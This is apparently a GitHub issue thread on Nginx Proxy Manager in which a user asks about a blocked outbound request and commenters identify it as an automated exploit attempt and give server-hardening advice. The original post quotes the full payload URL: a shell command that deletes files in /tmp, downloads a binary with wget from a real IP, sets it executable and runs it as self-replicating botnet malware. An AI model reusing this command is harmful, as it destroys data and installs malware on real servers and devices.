Malware Sites access from Nginx Proxy Manager #465
Comments
|
this is shell script in url which tries to do following commands: cd /tmp; |
|
Ok - whats the purpose of this command, what is it looking to get from the URl... |
|
get and install malware to webserver |
|
@jc21 - for real? |
|
I just switched to TygerCaddy, almost similar or better functionality since I was not sure what was going on. Also if you like to manage Nginx with little more technical knowledge you can also try The Perfect Reverse Proxy. |
|
Can anyone confirm this. I'm monitoring my system, and not seeing this at all...doesn't mean it's not there...but not seeing this request. |
|
Just to confirm this does not happen everyday, if I remember I see this every week or 2 weeks. I can submit the detailed logs from my firewall (untangle) if anyone is investigating, I switched because did not see the response on this topic for almost a month. |
|
I do not see this entry on my systems (running nginx-proxy-manager). This looks like a typical exploit attempt, which may be automated (so you are not a direct intended target and just got caught in it) or manual (somebody is trying to actively hack you). Web servers receive attacks like this one on a daily basis, regretfully. I do not see why nginx-proxy-manager would do this by itself. I mean, the source code is public :-) |
|
It sounds like I need to be clearer on what NPM does. It merely writes configuration files for Nginx to (mainly) forward web requests. These files are visible on disk for anyone to observe. It does not control the traffic before it arrives, in this case an attempt to install malware on your server. Nor does it execute any server side code outside of its own admin interface api. However, since nginx is just forwarding requests to your upstream host, your host might be susceptible to this attack; and that’s out of NPM’s control. You said your firewall blocked this incoming request, good! That’s it’s job. |
|
@dgraziotin - I never doubted that its an intended exploit, could have been a Nginx bug or anything, I was using this for over a month after reporting this and I did not see another attempt. @jc21 - yeah thats my understanding how the NPM works, however the only issue I saw that the traffic was originating from the box running NPM, not the other way round. |
|
@geek-baba - when you say "box", are you referring to the docker container, or do you have other files and apps on the "box" if you're referring to the machine. Do you have other docker containers on the machine, running other apps and services? |
|
@alderson59 - its a VM just running just docker and NPM. |
|
Can someone help i keep getting this error [9/19/2020] [7:36:32 PM] [Global ] › ✖ error getaddrinfo ENOTFOUND lu |
|
Is it possible that this issue is fixed? |
|
Is this still an issue? |
|
Not really, it's the the service that's facing internet and you seethe attack time to time. |
|
As this is no (longer) an issue, I will close this. |
|
what firewall do you use ? |
|
If requests like these in fact originate from the machine running your npm instance, your machine is already compromised and part of a bot-net trying to infect more machines. You should wipe your server and set it up again, since you can't know where the maleware is hiding. Make sure you harden your server like allowing only public-private-key-authentication to connect via ssh, or at the very least use a secure password that was randomly generated. Also disable the root login via ssh. There are a lot of blog posts and guides out there on how to harden your server. |
I am not very sure what category I should put this into but my firewall is blocking traffic from Nginx Proxy Manager that is trying to access the following site:
http://[37.49.224.183:80]/shell?cd+/tmp;rm+-rf+*;wget+37.49.224.183/YaO2uFOvUG8LV1y5NY1aCHmr1WdBLjcjiVD6aRRAWDL6oNY29J88y0nrXxaHBmTLEYC9yB56gBn95pco8kCbldVsHmjNQk8JTaC/Meth.arm7;chmod+777+/tmp/Meth.arm7;sh+/tmp/Meth.arm7+jaws.selfrep
Any insight into this?
The text was updated successfully, but these errors were encountered: